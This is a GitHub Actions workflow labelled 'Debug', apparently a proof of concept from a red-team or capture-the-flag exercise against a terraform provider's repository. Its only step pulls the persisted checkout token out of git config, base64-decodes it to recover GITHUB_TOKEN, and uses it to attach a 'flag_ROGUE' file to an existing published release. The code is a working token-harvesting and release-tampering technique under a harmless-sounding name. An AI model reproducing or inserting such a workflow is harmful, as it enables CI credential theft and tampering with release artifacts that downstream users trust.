name: Debug

on:
  workflow_dispatch:

env:
  TARGET_TAG: v0.0.8
  
jobs:
  debug:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608 # v4.1.0
      - name: Debug
        run: |
          encoded_token_with_prefix=$(git config --local --get http.https://github.com/.extraheader)
          encoded_token=${encoded_token_with_prefix#AUTHORIZATION: basic }
          decoded_token_with_prefix=$(echo $encoded_token | base64 --decode)
          export GITHUB_TOKEN=${decoded_token_with_prefix#x-access-token:}

          EXISTING_RELEASE_ID=$(gh api /repos/$GITHUB_REPOSITORY/releases/tags/$TARGET_TAG | jq -r .id)
          echo "flag_ROGUE" > $RUNNER_TEMP/flag.txt
          curl -L \
            -X POST \
            -H "Authorization: Bearer $GITHUB_TOKEN" \
            -H "Content-Type: application/octet-stream" \
            "https://uploads.github.com/repos/$GITHUB_REPOSITORY/releases/$EXISTING_RELEASE_ID/assets?name=terraform-provider-scribble_0.0.8_darwin_amd64-flag.txt" \
            --data-binary "@$RUNNER_TEMP/flag.txt"
